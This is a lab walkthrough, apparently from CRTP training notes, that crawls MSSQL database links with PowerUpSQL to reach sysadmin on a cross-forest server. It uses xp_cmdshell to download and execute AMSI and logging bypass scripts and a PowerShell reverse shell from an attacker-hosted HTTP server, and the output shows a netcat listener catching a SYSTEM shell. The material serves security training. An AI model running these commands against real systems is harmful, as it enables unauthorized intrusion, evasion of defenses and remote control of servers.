CRTP Lab 22

Task

Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorpmssql.

First, enumerate SQL servers in the domain and if student has privileges to connect to any of them. Run Invishell and use PowerUpSQL to enumerate.

PS C:\Users\student372> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.psd1

# Look for SPNs that start with MSSQL*
PS C:\Users\student372> Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose

Since we can connect to dcorp-mssql, we can use Get-SQLServerLinkCrawl to crawl the database links automatically.

PS C:\Users\student372> Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Verbose


VERBOSE:  Server: EU-SQL24
VERBOSE: --------------------------------
VERBOSE:  - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL24.EU.EUROCORP.LOCAL
VERBOSE:  - Link Login: sa
VERBOSE:  - Link IsSysAdmin: 1
VERBOSE:  - Link Count: 0
VERBOSE:  - Links on this server:

We have sysadmin on EU-SQL24 server.

If xp_cmdshell is enabled, it is possible to execute commands on EU-SQL24.

To avoid dealing with a large number of quotes and escapes, use the following command:

Get-SQLServerLinkCrawl -Instance dcorpmssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'set username'"

To get a reverse shell, we'll use Invoke-PowerShellTcpEx.ps1

Create a copy of Invoke-PowerShellTcpEx.ps1 and rename it to Invoke-PowerShellTcpEx1.ps1.

Add "Power -Reverse -IPAddress 172.16.100.X -Port 443" (without quotes) to the end of the file.

Host the files on attacker HTTP server. Start a listener using netcat.

Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.72/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.72/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql24

On Listener:

C:\Users\student372>cd C:\AD\Tools\netcat-win32-1.12\

C:\AD\Tools\netcat-win32-1.12>nc64.exe -lvnp 443
listening on [any] 443 ...
connect to [172.16.100.72] from (UNKNOWN) [172.16.15.17] 56942
Windows PowerShell running as user SYSTEM on EU-SQL24
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>
PreviousTrust Abuse - MSSQL ServersNextLateral Movement

Last updated